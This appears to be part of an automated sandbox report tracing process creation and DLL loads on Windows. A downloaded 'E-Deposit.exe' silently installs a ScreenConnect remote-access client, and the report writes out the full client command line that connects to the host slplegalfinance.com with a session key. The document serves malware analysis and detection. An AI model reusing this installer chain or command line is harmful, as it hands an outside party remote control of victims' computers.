                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2200 --field-trial-handle=2008,i,1922110675289968434,4499670213959222039,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3012 --field-trial-handle=2008,i,1922110675289968434,4499670213959222039,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: unknownProcess created: C:\Users\user\Downloads\E-Deposit.exe "C:\Users\user\Downloads\E-Deposit.exe"
                      Source: unknownProcess created: C:\Users\user\Downloads\E-Deposit.exe "C:\Users\user\Downloads\E-Deposit.exe"
                      Source: C:\Users\user\Downloads\E-Deposit.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\484f9eed1d8e13b9\ScreenConnect.ClientSetup.msi"
                      Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 1BC1320587D07C03BB9395DF6C2ADCED C
                      Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI6898.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5269750 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 9303049AB6428507101C6ED81D77CA3A
                      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding A00F0AFBAE6A0A1DBE6AED689C5C8D07 E Global\MSI0000
                      Source: unknownProcess created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe "C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=slplegalfinance.com&p=443&s=316b6739-92f5-44b7-a8b7-61cbbec9d115&k=BgIAAACkAABSU0ExAAgAAAEAAQDVyeZoBLn8WdM6xWDr4b0uAsUBfhP2EJOSdZugmbrUWVWehsUh2LvfCfwDYGcJBhcBEWS%2fDmahaCPw1tkv%2f%2bw18TIjThn%2bQ%2feZavwugcHDfdkaqKi0LnYdddcCsozuL7%2bVQevv9snFAHOiSjLD7xdNlPMSw%2bw682fIJIkr8XbdhPPukmg4Ksp6Kf1Xba7KkmNnwSS1MRXckDb%2f1hQrUI%2fSZZdGbJvZ3tc%2f3CR0LXLnGeCLG7Dt5iRIHwzJf5XuTInHiPesoO6bSk%2bUfoeCYO3BjvU6pRL6UKY08mjZ7e%2b6FOQb4acTm6QTR9K%2fsvFdvWQ%2br7EyKwXpSy6iTh4x7%2f%2bv"
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe" "RunRole" "84d633ef-1886-4997-bb3e-cec00c13098d" "User"
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                      Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k UnistackSvcGroup
                      Source: C:\Users\user\Downloads\E-Deposit.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\484f9eed1d8e13b9\ScreenConnect.ClientSetup.msi"
                      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 1BC1320587D07C03BB9395DF6C2ADCED C
                      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 9303049AB6428507101C6ED81D77CA3A
                      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding A00F0AFBAE6A0A1DBE6AED689C5C8D07 E Global\MSI0000
                      Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI6898.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5269750 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe" "RunRole" "84d633ef-1886-4997-bb3e-cec00c13098d" "User"
                      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
                      Source: C:\Users\user\Downloads\E-Deposit.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\Downloads\E-Deposit.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\Downloads\E-Deposit.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\Downloads\E-Deposit.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\Downloads\E-Deposit.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\Downloads\E-Deposit.exeSection loaded: wldp.dll
                      Source: C:\Users\user\Downloads\E-Deposit.exeSection loaded: amsi.dll
                      Source: C:\Users\user\Downloads\E-Deposit.exeSection loaded: userenv.dll
                      Source: C:\Users\user\Downloads\E-Deposit.exeSection loaded: profapi.dll
                      Source: C:\Users\user\Downloads\E-Deposit.exeSection loaded: version.dll
                      Source: C:\Users\user\Downloads\E-Deposit.exeSection loaded: msasn1.dll
                      Source: C:\Users\user\Downloads\E-Deposit.exeSection loaded: gpapi.dll
                      Source: C:\Users\user\Downloads\E-Deposit.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\Downloads\E-Deposit.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\Downloads\E-Deposit.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\Downloads\E-Deposit.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\Downloads\E-Deposit.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\Downloads\E-Deposit.exeSection loaded: propsys.dll
                      Source: C:\Users\user\Downloads\E-Deposit.exeSection loaded: edputil.dll
                      Source: C:\Users\user\Downloads\E-Deposit.exeSection loaded: urlmon.dll
                      Source: C:\Users\user\Downloads\E-Deposit.exeSection loaded: iertutil.dll
                      Source: C:\Users\user\Downloads\E-Deposit.exeSection loaded: srvcli.dll
                      Source: C:\Users\user\Downloads\E-Deposit.exeSection loaded: netutils.dll
                      Source: C:\Users\user\Downloads\E-Deposit.exeSection loaded: windows.staterepositoryps.dll
                      Source: C:\Users\user\Downloads\E-Deposit.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\Downloads\E-Deposit.exeSection loaded: wintypes.dll
                      Source: C:\Users\user\Downloads\E-Deposit.exeSection loaded: appresolver.dll
                      Source: C:\Users\user\Downloads\E-Deposit.exeSection loaded: bcp47langs.dll
                      Source: C:\Users\user\Downloads\E-Deposit.exeSection loaded: slc.dll
                      Source: C:\Users\user\Downloads\E-Deposit.exeSection loaded: sppc.dll
                      Source: C:\Users\user\Downloads\E-Deposit.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Users\user\Downloads\E-Deposit.exeSection loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Users\user\Downloads\E-Deposit.exeSection loaded: apphelp.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srpapi.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: tsappcmp.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textinputframework.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coreuicomponents.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textshaping.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wkscli.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mscoree.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msihnd.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: pcacli.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: srclient.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: spp.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: powrprof.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: vssapi.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: vsstrace.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: umpdc.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: version.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cabinet.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: moshost.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mapsbtsvc.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mosstorage.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ztrace_maps.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: bcp47langs.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mapconfiguration.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: storsvc.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: devobj.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: fltlib.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: bcd.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wer.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cabinet.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: storageusage.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: aphostservice.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: networkhelper.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: userdataplatformhelperutil.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: syncutil.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mccspal.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: vaultcli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dmcfgutils.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wintypes.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dmcmnutils.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dmxmlhelputils.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: inproclogger.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: windows.networking.connectivity.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: synccontroller.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: pimstore.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: aphostclient.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: accountaccessor.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dsclient.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: systemeventsbrokerclient.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: userdatalanguageutil.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mccsengineshared.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cemapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: userdatatypehelperutil.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: phoneutil.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: apphelp.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: mscoree.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: kernel.appcore.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: cryptsp.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: rsaenh.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: cryptbase.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: urlmon.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: iertutil.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: srvcli.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: netutils.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: sspicli.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: windows.storage.dll
